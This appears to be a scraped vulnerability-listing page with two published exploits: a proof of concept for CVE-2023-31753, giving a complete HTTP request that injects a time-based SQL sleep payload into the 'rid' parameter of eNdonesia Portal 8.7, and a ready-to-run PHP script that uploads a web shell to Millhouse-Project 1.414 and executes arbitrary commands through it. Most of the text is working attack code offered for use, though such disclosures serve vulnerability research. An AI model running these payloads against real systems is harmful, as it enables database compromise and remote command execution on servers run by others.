SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

Proof of Concept for CVE-2023-31753

Description: A SQL Injection vulnerability was discovered in eNdonesia Portal v8.7 which is exploited upon inserting crafted payload into "rid" parameter in diskusi.php.

*   Exploit Title: eNdonesia Portal 8.7 - SQL injection vulnerability in diskusi.php (rid parameter)
*   Date: May 19, 2023
*   Exploit Author: Kunal Khubchandani
*   Vendor Homepage: http://www.endonesia.org/
*   Software Link: https://sourceforge.net/projects/endonesia/
*   Version: 8.7
*   Category: Webapps
*   Tested on: WiN11\_x64/KaLiLinuX\_x64
*   CVE : CVE-2023-31753

#POC:

1.  To exploit this vulnerability, one must send a SQLi sleep payload as a value of "rid" GET Parameter in the following HTTP request.
    
2.  Vulnerable Request:
    

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select\*from(select(sleep(20)))a) HTTP/1.1  
Host: TARGET  
Accept-Encoding: gzip, deflate  
Accept: _/_  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  

3.  Upon sending the above http request through Burp Suite, the user will receive a response with a 20 seconds delay.

\*\* 20 Seconds Delay:

\*\* 30 Seconds Delay:

CVE-2023-31753: GitHub - khmk2k/CVE-2023-31753: Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7

Millhouse-Project v1.414 was discovered to contain a remote code execution (RCE) vulnerability via the component /add_post_sql.php.

    <?php
    /*
    Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
    Date: 12/05/2023
    Exploit Author: Chokri Hammedi
    Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
    Software Link: https://github.com/thrsrossi/Millhouse-Project.git
    Version: 1.414
    Tested on: Debian
    CVE: N/A
    */
    
    
    $options = getopt('u:c:');
    
    if(!isset($options['u'], $options['c']))
    die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
    \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
    \033[0m\n
    \n");
    
    $target     =  $options['u'];
    
    $command    =  $options['c'];
    
    $url = $target . '/includes/add_post_sql.php';
    
    
    $post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="title"
    
    helloworld
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="description"
    
    <p>sdsdsds</p>
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="category"
    
    1
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="image"; filename="rose.php"
    Content-Type: application/x-php
    
    <?php
    $shell = shell_exec("' . $command . '");
    echo $shell;
    ?>
    
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
    ';
    
    $headers = array(
        'Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
        'Cookie: PHPSESSID=rose1337',
    );
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // execute command
    
    $shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
    $ch = curl_init($shell);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $exec_shell = curl_exec($ch);
    curl_close($ch);
    echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
    
    ?>

Tag

#webkit